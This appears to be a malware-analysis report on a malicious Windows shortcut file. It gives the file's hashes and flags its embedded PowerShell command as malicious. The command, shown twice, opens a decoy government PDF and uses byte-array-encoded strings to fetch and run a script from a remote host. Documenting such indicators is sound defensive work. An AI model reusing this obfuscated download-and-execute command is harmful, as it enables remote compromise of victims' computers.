|
Hash | Hash Value |
|---|---|
| MD5 | aec4f8188e414df473f77258adb01a34
|
| Sha1 | 02c6e04aebeb5e8d584a72a11c6a19e7fa1eccb4
|
| Sha256 | 21cb07f97127a5427603d9d9540c68e0fce7e1d4863216d86799a84f32074d05
|
| Sha384 | 130f535294ee63d360cbda088fb70f8e89dc65777bf535237c2aee0f5f410c8efadea66952c7daf00ff02e3d3d1af5b9
|
| Sha512 | cb1c0089a114fc57eaf093d70685cffb10559639f1383cfbf0b0d3b8930a96e07272d27dc4e0afed4aab26e8c133366d7ef0040fe4840ade802436ef0bf2c021
|
| SSDeep | 48:8eHCkvWZGtmvLXwI+kQAuFqcAuDAuHTmr/KRe:8eHCPDvp+kQA0AiA8m5
|
| TLSH | 53412814DFF5431DE2B2863AECBFA2025932BD15DD1DD78D0142538E5872514A826F2F
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe start msedge.exe 'https://www.establishment.gov.pk/SiteImage/Misc/files/Assets%20Letter%20circurlar%202025.pdf' ;ping www.microsoft.com; $ax=[System.Text.Encoding]::UTF8.GetString([byte[]](109,109,115,46,112,104,111,110,101,45,117,112,100,97,116,101,46,99,108,105,99,107,47,99,98,49,49,48,55));$bx=[System.Text.Encoding]::UTF8.GetString([byte[]](105,114,109)); $cx=[System.Text.Encoding]::UTF8.GetString([byte[]](112,111,119,101,114,115,104,101,108,108)); &($bx) $ax | &($cx) ; |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe start msedge.exe 'https://www.establishment.gov.pk/SiteImage/Misc/files/Assets%20Letter%20circurlar%202025.pdf' ;ping www.microsoft.com; $ax=[System.Text.Encoding]::UTF8.GetString([byte[]](109,109,115,46,112,104,111,110,101,45,117,112,100,97,116,101,46,99,108,105,99,107,47,99,98,49,49,48,55));$bx=[System.Text.Encoding]::UTF8.GetString([byte[]](105,114,109)); $cx=[System.Text.Encoding]::UTF8.GetString([byte[]](112,111,119,101,114,115,104,101,108,108)); &($bx) $ax | &($cx) ; Malicious |
aec4f8188e414df473f77258adb01a34 |